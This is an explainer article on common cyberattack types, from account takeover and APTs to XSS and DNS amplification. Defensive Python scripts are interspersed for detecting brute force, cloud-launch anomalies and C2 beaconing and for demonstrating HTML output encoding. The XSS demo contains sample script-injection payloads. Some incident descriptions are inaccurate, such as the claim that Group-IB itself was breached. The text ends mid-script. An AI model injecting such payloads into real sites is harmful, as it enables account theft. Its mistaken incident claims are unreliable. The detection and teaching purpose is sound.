Account takeover is one of the more dangerous ways an attacker gains access to a user’s account. Usually, the attacker assumes the identity of a real user, customer, or employee in order to access the accounts of the person they are impersonating.
84% of firms experienced identity-related breaches in 2022 alone, and 96% of them stated that identity-centric security could have prevented or reduced the breach.
Finding unusual user activity can be very difficult if the right tools and controls (such as vendor management and zero trust) aren’t in place. Because of this, these attacks frequently go unnoticed: depending on how extensive the identity and access management (IAM) architecture is, or whether one exists at all, the authentication carried out by a bad actor may look just like that of a valid user.
What you should know is that account takeover is more covert than blatant card or credential theft, letting the attacker use the compromised account as much as possible before raising red flags for questionable activity. Any website that requires a login is vulnerable to this attack, and frequent targets include banks, well-known marketplaces, and financial institutions like PayPal.
Organizations must move beyond relying on network security alone if they want to improve user identity protection and authentication. Until recently, an organization’s capacity to centrally monitor the overall security of its resources was limited by the fact that certain technologies simply lacked the requisite integration capabilities. These days, access control is at the center of a plethora of technologies, such as multifactor authentication (MFA). To prevent illicit authentication on cloud apps, no user or device, whether inside or outside the company, should be implicitly trusted. Instead, access to every resource should be explicitly and continually authenticated and authorized.
How the attack is carried out: Brute force botnet attacks, phishing, malware, and proxy-based “checker” one-click apps are some of the most popular techniques. Other techniques include buying lists of “Fullz,” a name for complete packages of identifying information sold on the underground market, and dumpster diving to obtain personal information in trashed mail.
After purchasing or creating the victim’s profile, an identity thief can utilize the data to get around a knowledge-based verification system.
When a company still relies on network/endpoint security, or when there is a clear lack of or inadequate IAM framework, the attacker can also simply access the network or breach the perimeter. Because identity access constraints are weak in both cases, the attacker has complete control over the victim’s account and can log in using the stolen credentials without being noticed.
Where the attack originates: We conduct a huge number of our transactions, both financial and non-financial, online. Obtaining account passwords and personal data (such as phone numbers, home addresses, credit card numbers, and other financial information) is a lucrative endeavor for cybercriminals, regardless of whether they decide to sell the data or utilize it for their own benefit. Due to the rising frequency of phishing assaults, the proliferation of user identities, and the ongoing expansion of cloud use, attackers can originate from any source, including contractors, employees, independent contractors, and third-party vendors.
An advanced persistent threat (APT) from China compromised 25 Microsoft Exchange accounts belonging to different U.S. agencies in one noteworthy incident. As per reports, the APT group was able to gain unauthorized access to various Azure Active Directory applications, including those that support personal account authentication like Teams, OneDrive, SharePoint, and customers’ applications that enable the ‘login with Microsoft’ functionality, as well as multitenant applications under specific circumstances.
What is essential to know:
An advanced persistent threat (APT) is a sophisticated, covert attack in which an unauthorized user breaches a computer system or network, evades detection, and collects information for commercial or political purposes. Financial gain or political espionage is the primary goal, usually pursued by criminals or nation-states. APTs are still mostly linked to nation-state actors who want to steal trade or government secrets, but anonymous cybercriminals can also use APT techniques to steal intellectual property or data.
How the attack is carried out: An advanced persistent threat (APT) typically uses a combination of very sophisticated tactics, such as some intelligence gathering, and less sophisticated ways to gain access to the system, such as spear phishing and malware. Target compromise and access maintenance are accomplished using a variety of techniques.
The most popular attack strategy involves reading an authentication database, figuring out which accounts have the right privileges, and then using those accounts to compromise resources in order to spread from a single machine to a whole network. In the exploited environment, APT actors also install backdoor programs (such as Trojan horses) on compromised machines so that they can re-enter even if the stolen credentials are later changed.
Where the attack originates: The majority of APT organizations work as agents of, or are connected to, the governments of sovereign states. An APT operator may also be a full-time professional hacker employed by those states. These state-sponsored hacking groups typically possess the means and expertise to thoroughly investigate their target and identify the ideal point of entry.
With the growth of cloud computing, the quantity of innovative assaults on virtual environments has skyrocketed. Furthermore, Amazon Web Services, one of the biggest providers of cloud services, has seen its fair share of challenges.
The security of cloud deployments is at risk from a number of problems. For instance, when a digital marketing company went out of business, its Amazon S3 bucket was left unprotected, and the data of thirty-six thousand people was exposed.
The complete breach included 50,000 files comprising 32GB of full names, addresses, phone numbers, email addresses, and hashed passwords.
What you should know: According to Amazon’s “shared responsibility” approach, the client is in charge of the security within the S3 container, while AWS is in charge of the environment outside the virtual machine.
This means that as businesses have quickly embraced cloud technology, threats that exploit misconfigurations and deployment problems have grown more prevalent, and the company using AWS is responsible for maintaining the security of its own environment.
The result is that AWS users now have additional risks to worry about.
How the attack occurs: There are several methods in which an attack on an AWS instance can take place. It’s crucial to maintain vigilance for even seemingly innocuous actions within an AWS environment. Actions to watch out for include S3 access from strange places and from unknown individuals.
Controlling and keeping an eye on who has access to an organization’s AWS infrastructure is also crucial.
Investigative efforts can be effectively launched by identifying questionable logins to AWS infrastructure.
Some actions carry direct financial costs: compromised credentials can be used to launch EC2 instances, and the customer is billed for every instance the attacker creates.
Where the attack originates: Due to the variety of services hosted on AWS and the continual emergence of new cloud threat types, these attacks can essentially originate from anywhere.
An active and as-yet-unidentified threat actor used several tactics to obtain and exploit information from high-value targets. One technique involved abusing OAuth (Open Authorization) tokens to gain access to well-known companies’ repositories, such as the production infrastructure of GitHub’s npm and apps integrated with cloud offerings like Travis-CI and Heroku.
What you should know is that an attacker can utilize the user-granted REST API to carry out tasks like contact enumeration and email searches by obtaining an OAuth access token.
If a malicious program obtains an OAuth access token from a cloud-based email provider and is then issued a “refresh” token that allows background access, it may be able to access user account features permanently.
How the attack is carried out: By using application access tokens, attackers can get beyond the standard authentication procedure and gain access to password-protected accounts, data, or services on distant systems. Usually taken from users, these tokens are used in place of login credentials.
Where the attack originates:
One way to compromise other services is through compromised access tokens. If a token, for instance, allows access to the victim’s primary email, the attacker could be able to use forgotten password procedures to gain access to all other services the target is subscribed to. Using a token for direct API access renders a second authentication factor ineffective and may be resistant to countermeasures like password changes.
Paypal is an online payment system and financial service that makes it simple for users to send and receive money. However, the same qualities that make Paypal so effective and rapid to send money are also used by cybercriminals to steal money. Through payment fraud methods, hackers and con artists take advantage of the system to steal money from customers, sometimes even wiping out entire bank accounts.
What is essential to know:
Any fraudulent or unauthorized transaction in which a cybercriminal takes money away from customers is referred to as bill fraud, also known as payment fraud. These tactics are effective; in 2022, consumers reported losing around $8.8 billion due to fraud, up more than 30% from the year before, according to current FTC data.
How the attack operates: To keep a large number of users from realizing the fraud, this assault continuously fools them into paying little or reasonable amounts of money. In this scam, hackers issue fake bills that appear real and encourage victims to transfer money out of their accounts.
The attackers capitalize on the possibility that their targets will mistakenly believe the bogus bill is for a service they genuinely use, since they are aware that the majority of clients frequently utilize fee-based digital services.
After that, customers will start a credit card payment or cash transfer to cover the cost of the fraudulent “bill.”
Where the attack originates:
Organizations engaged in bill fraud have their roots everywhere, including the US. Usually, it is outsourced to hackers who have the means, time, and equipment to produce phony invoices that appear authentic. Similar to phishing, bill fraud typically targets a large, haphazard group of people.
Brute force attacks can occur on any kind of service; Windows Remote Desktop Protocol (RDP) is one current example. Due to a high number of exposed endpoints, Microsoft has seen a notable increase in RDP brute force assaults from early 2020 to the present. This enables threat actors to successfully exploit weak or widely used credentials to obtain unauthorized access to a variety of systems.
What is essential to know:
Using a trial-and-error method, a brute force attack seeks to obtain personal information, particularly usernames and passwords. One of the easiest ways to get into a password-protected account, server, or program is to try username and password combinations until the attacker finds one that works. There are billions of possible combinations for a six-character password, but the attacker only needs one of them to succeed.
How the attack takes place:
A dictionary attack is the most fundamental type of brute force assault, in which the attacker methodically searches through a dictionary or wordlist, trying each entry one by one until they hit. They may even utilize customized dictionaries that contain leaked or frequently used passwords, or they may supplement words with symbols and numbers. Additionally, automated tools for running dictionary attacks can make this work much quicker and less tedious if they lack the necessary time or patience.
Where the attack originates: Because a brute force attack is so simple and convenient, even hackers and cybercriminals with little to no technical skill can attempt to access someone’s account. The individuals spearheading these efforts possess sufficient time or computing capacity to ensure their success.
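The defender’s side of the dictionary and password-spray attacks described above, as an added example that is not part of the original article: this Python script replays a constructed authentication log (the IPs and account names are invented) and flags sources that exceed a failure threshold inside a sliding window, escalating when a success follows the burst.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample authentication log (not real data). One event per line:
# <ISO timestamp> <source IP> <account> <FAIL|SUCCESS>
SAMPLE_LOG = """\
2024-03-01T10:00:01 203.0.113.7 admin FAIL
2024-03-01T10:00:02 203.0.113.7 admin FAIL
2024-03-01T10:00:03 203.0.113.7 admin FAIL
2024-03-01T10:00:04 203.0.113.7 admin FAIL
2024-03-01T10:00:05 203.0.113.7 admin FAIL
2024-03-01T10:00:06 203.0.113.7 admin FAIL
2024-03-01T10:00:09 203.0.113.7 admin SUCCESS
2024-03-01T10:02:00 192.0.2.9 alice FAIL
2024-03-01T10:02:01 192.0.2.9 bob FAIL
2024-03-01T10:02:02 192.0.2.9 carol FAIL
2024-03-01T10:02:03 192.0.2.9 dave FAIL
2024-03-01T10:02:04 192.0.2.9 erin FAIL
2024-03-01T10:05:00 198.51.100.4 alice FAIL
2024-03-01T10:05:30 198.51.100.4 alice SUCCESS
"""


def parse_line(line):
    """Split one log line into (timestamp, source_ip, account, outcome)."""
    ts, ip, account, outcome = line.split()
    return datetime.fromisoformat(ts), ip, account, outcome


def detect_brute_force(log_text, max_failures=5, window=timedelta(minutes=1)):
    """Flag source IPs with at least max_failures failed logins inside a sliding window.

    Returns {ip: {"failures", "distinct_accounts", "pattern", "success_after_burst"}}.
    "dictionary" = many guesses against one account (the wordlist attack in the text);
    "spray" = one guess per account across many accounts.
    """
    recent = defaultdict(deque)   # ip -> failures (timestamp, account) still inside the window
    alerts = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, ip, account, outcome = parse_line(line)
        q = recent[ip]
        while q and ts - q[0][0] > window:   # expire failures older than the window
            q.popleft()
        if outcome == "FAIL":
            q.append((ts, account))
            if len(q) >= max_failures:
                accounts = {a for _, a in q}
                alert = alerts.setdefault(ip, {"failures": 0, "success_after_burst": False})
                alert["failures"] = max(alert["failures"], len(q))
                alert["distinct_accounts"] = len(accounts)
                alert["pattern"] = "spray" if len(accounts) > 1 else "dictionary"
        elif outcome == "SUCCESS" and ip in alerts:
            # A success right after a burst of failures is the highest-priority signal:
            # the guess most likely worked, so treat the account as compromised.
            alerts[ip]["success_after_burst"] = True
    return alerts


if __name__ == "__main__":
    for ip, info in detect_brute_force(SAMPLE_LOG).items():
        print(ip, info)
```

A per-source threshold misses the botnet variant mentioned above, where each node sends only a few guesses; for that, aggregate failures per target account as well.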
Like business invoice fraud, business email compromise (BEC) has changed over time, particularly with the increase in video calls following COVID-19. Using fake meeting invitations, shady characters who pose as reliable business contacts often carry out the attack. As per a study, there has been a surge in BEC complaints to the FBI IC3, alleging that victims are being instructed to transfer funds to bogus accounts through virtual meeting platforms.
What is essential to know:
Business email compromise tries to fool victims into paying a phony bill that seems real and is sent to their company. In reality, the money goes to con artists posing as vendors, partners, or business associates. Attackers might entice high-profile targets with intricate and convincing phishing scams, or they can target institutions in developing regions with weak cybersecurity infrastructure or operational controls. These tactics frequently go beyond simple fraud. The only goal these cybercrime syndicates have is money, and in large quantities.
How the attack happens: In one scenario, hackers get around local security mechanisms by using highly sophisticated malware. They then use a messaging network to which they have access to send fake messages that initiate cash transfers from larger banks’ accounts. In a different scenario, the attackers persuade stakeholders to move substantial amounts of money to their bank accounts by launching targeted spear phishing attacks. Victims receive fictitious invoices in the hope that they will skip their own accounts payable procedures.
Hackers will select targets according to the size of the company, the location, and the suppliers they employ, then produce fake invoices that seem authentic.
They send fictitious invoices with demanding terms like “90 days past due, pay now!” in the hopes that the victim’s accounts payable staff is overworked.
Origin of the attack: Although there are many lone con artists committing business invoice fraud, many are linked to fraud rings that possess the structure and means to investigate their target’s financial institution and fabricate an authentic-looking invoice. There are fraud gangs operating invoice frauds everywhere in the world.
Wire attack perpetrators in the past have included highly organized international and nation-state cybercrime outfits like APT 38 and Lazarus Group.
These groups possess the tools and resources needed to execute intricate and multifaceted attacks. Although the identity of the specific leader of these gangs is unknown, some reports have suggested that they may be connected to North Korea.
However, sophisticated wire transfer attacks have also been linked to cyber gangs in China and Nigeria. A word of caution: insiders are probably used in high-value wire attacks at organizations with stronger security measures.
Cloud cryptomining needs no gas to run. For proof, look no further than GitHub. Threat actors conducted a wide-ranging freejacking operation, encompassing 30 GitHub accounts, 2,000 Heroku accounts, 900 Buddy accounts, and 130 Docker Hub images. This allowed them to abuse a large number of free accounts with as little human effort as possible, and it made the cloud-based software code repository the target of a cloud cryptomining attack.
What is essential to know:
Cryptomining is a resource-intensive, deliberately difficult business. Its difficulty is designed to keep the rate at which new blocks are mined constant. So it is no surprise that ambitious but dishonest miners turn to cryptojacking, the practice of commandeering the processing power of large businesses.
How the attack takes place:
The media’s focus on cryptocurrency mining has grown since the practice’s meteoric rise to prominence in the fall of 2017. From mobile devices and in-browser flaws, the attacks have shifted to enterprise cloud services like Microsoft Azure, Google Cloud Platform (GCP), and Amazon Web Services.
Since hackers are always improving the ways in which they can avoid detection—such as by using unlisted endpoints, controlling their CPU consumption, or disguising the IP address of the mining pool behind a free content delivery network (CDN)—it is challenging to pinpoint the precise extent of the practice.
The expenses to the account holder can skyrocket when miners hijack a cloud instance, frequently creating hundreds of new instances. Thus, it’s imperative to keep an eye out for any unusual activity on systems that might point to a network compromise.
Where the attack originates: Since cryptocurrencies are a worldwide good, these attacks might come from anyone. Rather than concentrating on the origins of the attacks, it is crucial to monitor cloud computing instances for activity related to cryptojacking and cryptomining, such as newly created instances in previously unused regions, users launching unusually large numbers of instances, or compute instances started by previously unseen users.
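One way to implement the monitoring just described, and the AWS checks earlier on this page (S3 or EC2 activity from strange places and unknown users, instances the customer will be billed for), as an added example that is not the article’s or AWS’s own code: it scans constructed CloudTrail-style RunInstances events (invented users, regions and IPs) against a baseline of what normally happens in the account.

```python
from collections import Counter

# Constructed baseline of normal activity (invented values): which IAM users normally
# launch instances, in which regions, and the largest per-call count seen while baselining.
BASELINE = {
    "known_users": {"ci-deployer", "alice"},
    "known_regions": {"us-east-1", "eu-west-1"},
    "max_instances_per_call": 4,
}

# Constructed CloudTrail-style events, trimmed to the fields used here (not real data).
SAMPLE_EVENTS = [
    {"eventTime": "2024-03-01T09:00:00Z", "eventName": "RunInstances", "awsRegion": "us-east-1",
     "userIdentity": {"userName": "ci-deployer"}, "sourceIPAddress": "198.51.100.10",
     "responseElements": {"instancesSet": {"items": [{"instanceId": "i-0a1"}, {"instanceId": "i-0a2"}]}}},
    {"eventTime": "2024-03-01T23:14:00Z", "eventName": "RunInstances", "awsRegion": "ap-southeast-2",
     "userIdentity": {"userName": "alice"}, "sourceIPAddress": "203.0.113.77",
     "responseElements": {"instancesSet": {"items": [{"instanceId": f"i-0b{n:02d}"} for n in range(40)]}}},
    {"eventTime": "2024-03-01T23:20:00Z", "eventName": "RunInstances", "awsRegion": "us-east-1",
     "userIdentity": {"userName": "svc-backup"}, "sourceIPAddress": "203.0.113.77",
     "responseElements": {"instancesSet": {"items": [{"instanceId": "i-0c1"}]}}},
    {"eventTime": "2024-03-01T23:21:00Z", "eventName": "DescribeInstances", "awsRegion": "us-east-1",
     "userIdentity": {"userName": "alice"}, "sourceIPAddress": "198.51.100.10"},
]


def instance_count(event):
    """Number of instances a RunInstances call actually created."""
    items = event.get("responseElements", {}).get("instancesSet", {}).get("items", [])
    return len(items)


def find_suspicious_launches(events, baseline):
    """Return one alert per RunInstances event that deviates from the baseline."""
    alerts = []
    for ev in events:
        if ev.get("eventName") != "RunInstances":
            continue
        user = ev.get("userIdentity", {}).get("userName", "<unknown>")
        region = ev.get("awsRegion", "<unknown>")
        count = instance_count(ev)
        reasons = []
        if user not in baseline["known_users"]:
            reasons.append("previously unseen user")
        if region not in baseline["known_regions"]:
            reasons.append(f"previously unused region {region}")
        if count > baseline["max_instances_per_call"]:
            reasons.append(f"{count} instances in one call (baseline max {baseline['max_instances_per_call']})")
        if reasons:
            alerts.append({"time": ev["eventTime"], "user": user, "region": region,
                           "source_ip": ev.get("sourceIPAddress"), "instances": count, "reasons": reasons})
    return alerts


def launches_by_source_ip(events):
    """Instances launched per caller IP: one address driving several identities is itself a signal,
    and the total is what the account holder will be billed for."""
    totals = Counter()
    for ev in events:
        if ev.get("eventName") == "RunInstances":
            totals[ev.get("sourceIPAddress")] += instance_count(ev)
    return totals


if __name__ == "__main__":
    for alert in find_suspicious_launches(SAMPLE_EVENTS, BASELINE):
        print(alert["time"], alert["user"], alert["region"], alert["instances"], "; ".join(alert["reasons"]))
    print(launches_by_source_ip(SAMPLE_EVENTS))
```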
Cybersecurity experts utilize the commercial penetration testing program Cobalt Strike to model sophisticated threat behaviors and evaluate the security posture of a business. With its “Beacon” payload, it is most notable for its breadth of capabilities, which include post-exploitation, exploitation, and reconnaissance.
This payload has made it possible to command and control (C2) compromised hosts in recent years, allowing for covert communication, lateral movement, and a variety of in-memory attack strategies. Cobalt Strike is a genuine tool for threat emulation and red team operations, however because of its strong features and ability to evade detection, malicious actors have also exploited hacked versions of this software in cyberattacks.
What is essential to know:
When a hacker gains control of a computer, they are carrying out a command and control attack, which involves sending malware or commands to other systems on the network. Sometimes, the attacker moves laterally across the network to obtain sensitive data by conducting reconnaissance operations. The prevalence of these attacks is still rising, as seen by the startling 30% increase of command-and-control servers (C2) in 2022 alone.
Hackers may also use this infrastructure to launch further attacks. Among the infrastructure’s most crucial roles is running the servers that communicate with implants on compromised endpoints. These assaults are also frequently called C&C or C2 attacks.
How the attack is carried out: The majority of hackers use phishing emails to enter a system and then install malware. By doing this, a command and control channel is created that serves as a data proxy between the attacker and the compromised endpoint. These channels provide commands to the vulnerable endpoint and the attacker receives the output of those commands.
Where the attack originates: Russia, Iran, and even the United States have all been the target of well-known command and control attacks. The uncomfortable truth is that these attackers can appear anywhere and at any time.
Because communication is so important, hackers employ strategies meant to conceal the actual content of their messages. They often use a range of techniques to communicate over various channels while keeping a low profile, trying to keep their activities running for as long as possible without being discovered.
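Because a C2 channel has to keep checking in, one of the signals defenders look for is the regularity of that check-in. As an added example that is not part of the original article, this Python script reads a constructed outbound connection log (invented internal host and destinations) and flags host/destination pairs whose connection intervals are too even to be human-driven browsing.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, stdev

# Constructed outbound connection log (invented addresses). One connection per line:
# <ISO timestamp> <internal host> <destination IP> <destination port>
SAMPLE_CONNECTIONS = """\
2024-03-01T10:00:00 10.0.0.5 203.0.113.9 443
2024-03-01T10:00:10 10.0.0.5 198.51.100.3 443
2024-03-01T10:00:15 10.0.0.5 198.51.100.3 443
2024-03-01T10:01:02 10.0.0.5 203.0.113.9 443
2024-03-01T10:01:59 10.0.0.5 203.0.113.9 443
2024-03-01T10:03:01 10.0.0.5 203.0.113.9 443
2024-03-01T10:03:40 10.0.0.5 198.51.100.3 443
2024-03-01T10:04:00 10.0.0.5 203.0.113.9 443
2024-03-01T10:05:01 10.0.0.5 203.0.113.9 443
2024-03-01T10:05:58 10.0.0.5 203.0.113.9 443
2024-03-01T10:07:00 10.0.0.5 203.0.113.9 443
2024-03-01T10:09:00 10.0.0.5 198.51.100.3 443
2024-03-01T10:09:05 10.0.0.5 198.51.100.3 443
2024-03-01T10:20:00 10.0.0.5 198.51.100.3 443
"""


def parse_connection(line):
    """Split one log line into (timestamp, source host, 'dest:port')."""
    ts, src, dst, port = line.split()
    return datetime.fromisoformat(ts), src, f"{dst}:{port}"


def find_beacons(log_text, min_connections=6, max_jitter_cv=0.2):
    """Return (src, dst) pairs whose connection intervals are suspiciously regular.

    The check is the coefficient of variation (stdev / mean) of the gaps between
    consecutive connections: a beacon with a fixed sleep plus small jitter keeps it
    near zero, while human-driven traffic is bursty and scores much higher.
    """
    stamps = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, dst = parse_connection(line)
        stamps[(src, dst)].append(ts)
    hits = {}
    for pair, times in stamps.items():
        if len(times) < min_connections:
            continue               # too few samples to judge regularity
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue               # everything at the same instant: a burst, not a beacon
        cv = stdev(gaps) / avg
        if cv <= max_jitter_cv:
            hits[pair] = {"connections": len(times),
                          "mean_interval_s": round(avg, 1),
                          "jitter_cv": round(cv, 3)}
    return hits


if __name__ == "__main__":
    for (src, dst), info in find_beacons(SAMPLE_CONNECTIONS).items():
        print(f"{src} -> {dst}: {info}")
```

Beacons with large randomised sleep intervals raise the coefficient of variation and will slip past a fixed threshold, so this check is a triage signal to combine with destination reputation and payload size, not a verdict on its own.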
In 2023, Group-IB, a leader in worldwide cybersecurity, experienced a significant data breach. Tens of thousands of accounts with saved ChatGPT credentials were compromised by the coordinated attack. It should come as no surprise that cybercrime syndicates have become very fond of the large language model-based chatbot, especially when it comes to breaking into accounts and exposing private data for campaigns against businesses and their employees.
What you should know: The majority of users still authenticate themselves using single-factor authentication, which is generally frowned upon in the cybersecurity community. Even with the introduction of more stringent password regulations (such as character count, mix of digits and symbols, and intervals for renewal), end users continue to reuse their login information across platforms, apps, and accounts without changing it on a regular basis.
Adversaries can more easily access a user’s account with this kind of approach, and many of the breaches that occur today are the result of these credential harvesting activities.
How the attack takes place:
A threat actor may utilize a password, key, or other identified information to access data and resources without authorization. This might happen to a single account or to a whole database.
Through the use of a reliable account within the intended target organization, a threat actor can remain hidden and steal confidential information without causing suspicion. Phishing schemes, malware assaults, and password sniffers are common techniques for credential harvesting.
Where the attack originates:
A significant attack vector is compromised credentials, which provide relatively easy access for threat actors to computing devices, password-protected accounts, and an organization’s network infrastructure. These criminals are frequently well-organized and have a target or targets in mind.
Furthermore, they might not always be external to the corporation; they could be internal threats with some degree of authorized access to its databases and systems.
Recently, Trigona, a new ransomware strain, was discovered. It employs distinct techniques to target Windows, specifically using the Mimikatz tool to extract sensitive data from Windows, including the registry, Windows memory, and the Local Security Authority Subsystem Service (LSASS) process. After that, Mimikatz extracts and dumps all of the credentials—which include hashes, Kerberos tickets, and users and passwords—into a file.
What you should know: An attack that depends on obtaining credentials from a targeted system is known as “credential dumping.” An attacker can still retrieve the data and crack it offline on their own systems, even though the credentials are frequently hashed or encrypted. For this reason, the attack is called “dumping.”
Hackers frequently attempt to take credentials from systems they have already gained access to. When individuals use the same password for many accounts on other platforms, the issue is exacerbated.
How the attack is carried out: The credentials that are obtained in this manner are typically those of privileged users, which may grant access to more private data and system functions.
Hackers frequently target a multitude of sources in an attempt to obtain the credentials, such as the Security Account Manager (SAM) database, the Local Security Authority (LSA), the NTDS database on domain controllers, or Group Policy Preference (GPP) files.
After gaining legitimate credentials, attackers can easily navigate a target network, finding new systems and assets of interest.
Where the attack is coming from: Anywhere can be the source of credential dumping.
Furthermore, as we are all guilty of reused passwords, that data may be sold for use in other attacks.
The 2022 Paypal breach, which unfortunately for the online payment system affected over 30,000 accounts in the course of a few months, is one prominent example of a credential reuse assault. According to an email sent out by Paypal following the incident, threat actors obtained access to personal data, including their “name, address, Social Security number, individual tax identification number, and/or date of birth.”
What you should know: Reusing credentials is a widespread problem in every organization or user base. These days, the majority of users have tens, if not hundreds, of accounts, and they have a lot of passwords to remember that need to fulfill a variety of complicated specifications. Consequently, individuals will turn to repeatedly using the same password in an attempt to improve account management and memory.
Not surprisingly, if those credentials are compromised, this can lead to serious security problems.
How the attack takes place:
The assault itself is theoretically easy to execute, uncomplicated, and relatively covert (if two-factor authentication isn’t turned on). The “reuse” in “credential reuse attack” comes from the fact that the hacker can attempt using the same login and password on different banking or consumer websites until they find a match after obtaining the user’s credentials.
But getting admitted in the first place is a little trickier. Attackers typically start with a phishing attempt in order to obtain privileged information. They do this by exploiting websites and emails that appear authentic to trick the victim into providing their credentials.
The source of the attack could be someone who knows the victim and wants access to their accounts for financial, professional, or personal reasons. This could be a targeted attack. Another possibility for the attack’s source could be a total stranger who purchased the user’s personal data on the dark web.
Recently, Zimbra, a collaboration software package, was found to have a cross-site scripting (XSS) vulnerability that enables threat actors to collect sensitive user data in a targeted assault.
Malicious scripts can be inserted into trustworthy and otherwise innocuous websites through XSS attacks.
Similar in concept to SQL injection, which involves inserting malicious code into a form to access the website’s database, cross-site scripting (XSS) allows an attacker to take advantage of user cookies, read session IDs, modify website contents, or send users to malicious websites. The malicious code in XSS is intended to run in the browser of a different website visitor.
What you should know: Cross-site scripting (XSS) attacks happen when an attacker sends malicious code, typically in the form of a browser-side script, to a separate end user through a web application. These attacks are possible wherever a web application includes user input in its output without encoding or validating it, which makes such vulnerabilities widespread.
When the script runs, the end user’s browser has no way to know that it shouldn’t be trusted. Because it treats the script as coming from the site, the script has access to cookies, session tokens, and other private data stored in the browser, and it can modify the content of the HTML page.
How the attack takes place:
XSS attacks come in two flavors: reflected and stored. A stored cross-site scripting (XSS) attack happens when an injected script is kept on the server in a fixed place, such as a comment or post on a forum. The XSS attack will impact every user that visits the compromised page. The injected script is presented to the user as a response to a request in reflected XSS, such as a search results page.
Where the attack originates:
Even though XSS attacks are less frequent than they once were (mainly because of advancements in browsers and security technology), they are still significant enough to be included in the top ten threats by the Open Web Application Security Project, and almost 14,000 vulnerabilities are linked to XSS attacks in the Common Vulnerabilities and Exposures database.
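The two flavors described above, shown side by side with their fix, as an added example that is not from the original article or from Zimbra: a constructed comment store and search parameter (not real data) are rendered first without and then with output encoding, which is the control that stops the browser from treating user text as markup.

```python
from html import escape

# Constructed comment store standing in for the forum's database (not real data).
# The second entry is what a stored-XSS payload looks like once it is saved server-side.
STORED_COMMENTS = [
    "Great write-up, thanks!",
    "<script>alert('stored')</script>",
]


def render_comments_vulnerable(comments):
    """Stored XSS: saved comment text is concatenated into the page unencoded,
    so every visitor's browser runs whatever markup the comment contains."""
    return "<ul>" + "".join(f"<li>{c}</li>" for c in comments) + "</ul>"


def render_comments_safe(comments):
    """Same page with output encoding: & < > ' " become entities, so the browser
    shows the comment as text instead of parsing it as markup."""
    return "<ul>" + "".join(f"<li>{escape(c, quote=True)}</li>" for c in comments) + "</ul>"


def render_search_vulnerable(query):
    """Reflected XSS: the request parameter is echoed straight back into the response,
    both in the body and inside an attribute."""
    return f'<p>Results for: {query}</p><input name="q" value="{query}">'


def render_search_safe(query):
    """quote=True matters for the attribute: without it a query containing a double
    quote could close the value attribute and inject new attributes or tags.
    HTML entity encoding is the right escaping for HTML body and attribute contexts
    only; data placed inside <script>, a URL or CSS needs context-specific encoding."""
    safe = escape(query, quote=True)
    return f'<p>Results for: {safe}</p><input name="q" value="{safe}">'


def contains_raw_script_tag(html_fragment):
    """Crude check used here to make the difference visible: does the output still
    carry a parsable <script tag? (A real scanner would use an HTML parser.)"""
    return "<script" in html_fragment.lower()


if __name__ == "__main__":
    print(render_comments_vulnerable(STORED_COMMENTS))
    print(render_comments_safe(STORED_COMMENTS))
    print(render_search_safe('"><b>bold</b>'))
```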
Cybercriminals stole cryptocurrency in July 2023 by surreptitiously mining up to 200 cloud workloads without users’ consent.
The cryptojacking assault began when covert fileless payloads were skillfully loaded into the memory of the target system without being discovered.
What you should know: A hacker using malware that conceals on a device targets and hijacks computer systems in order to mine cryptocurrency, like Bitcoin or Ethereum, at the expense of the victim. This type of attack is known as cryptojacking. The goal of the hacker is to use the computer resources of others to create valuable cryptocurrencies.
How the attack is carried out: One typical method is a cryptojacking email that includes a malicious link inviting recipients to download cryptomining programs straight onto their machine. Another method is a drive-by attack, which involves inserting JavaScript code into a webpage that the victim visits. Malicious programs meant to mine cryptocurrency download onto the device as soon as the page is viewed. The cryptomining code then operates in the background without the user’s awareness; in fact, a slower-than-usual computer may be the only clue that something is amiss.
Origin of the attack: Since cryptojacking doesn’t require a lot of technical expertise, attacks like these might originate anywhere in the world. On the deep web, cryptojacking kits may be purchased for as low as $30. For hackers looking to generate quick cash at minimal risk, it’s an easy access point.
Malicious actors used the international corporate communications provider Mitel to orchestrate large-scale, amplified distributed denial-of-service (DDoS) assaults in February 2022.
Financial institutions, ISPs, logistics and gaming enterprises, among other entities, were severely impacted by the attack. With a single malicious network packet, these attacks, which have the potential to last up to 14 hours and have a record-breaking amplification factor of about 4.3 billion to one, can take down a whole organization’s voice communications and other services.
What you should know: Although DNS amplification attacks, a particular kind of DDoS attack, have been around for a while, the methods of exploitation keep changing. The attack bears similarities to DNS hijacking in that both exploit misconfigurations in the internet’s directory, but it works in a somewhat different way.
A network service vulnerable to DNS amplification answers a tiny request with a significantly larger response. By spoofing the victim’s address so that the response is aimed at the victim, an attacker can exert relatively little effort while forcing other people’s servers to do all the work of flooding the target offline.
How the attack works: A DNS amplification attack floods a target with DNS responses to lookup requests it never made until the site goes down because its network bandwidth is exhausted. In contrast to DNS hijacking, which can send users to another website, a DNS amplification attack simply stops the website from loading.
The term “amplification” points to the other difference between the two attacks. Hackers craft DNS requests that elicit a much larger answer than the request itself. A hacker might ask for more information, for instance, than just the domain name’s address. An “ANY” record request, which asks for the domain along with its subdomains, mail servers, backup servers, aliases, and more, is another option available to the attacker.
Now imagine many of these “ANY” responses arriving at the victim at once: the increased traffic forces the site offline.
Where the attack originates: Because of its very simple nature, the attack can originate from any place in the world, be it a nation-state hacker or a lone wolf, much like a DNS hijacking attack.
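How a resolver operator can spot the pattern just described, as an added example that is not part of the original article: the script parses a constructed query log (invented client addresses and byte counts; the line format is an assumption) and computes the response-to-request byte ratio per client, flagging the bulk ANY traffic whose “client” is the spoofed victim.

```python
import re
from collections import defaultdict

# Constructed resolver query log (invented addresses). One query per line:
# <ISO timestamp> client=<IP> qname=<name> qtype=<type> req=<request bytes> resp=<response bytes>
LEGIT = """\
2024-03-01T12:00:00 client=203.0.113.5 qname=example.com qtype=A req=45 resp=61
2024-03-01T12:00:03 client=203.0.113.5 qname=www.example.com qtype=AAAA req=49 resp=77
2024-03-01T12:00:09 client=203.0.113.5 qname=example.com qtype=MX req=45 resp=112
"""
# A reflection flood: the "client" address is the spoofed victim, and every query is an
# ANY lookup chosen because its answer is dozens of times larger than the request.
FLOOD = "".join(
    f"2024-03-01T12:01:{s % 60:02d} client=198.51.100.20 qname=example.com qtype=ANY req=45 resp=3190\n"
    for s in range(50)
)
SAMPLE_LOG = LEGIT + FLOOD

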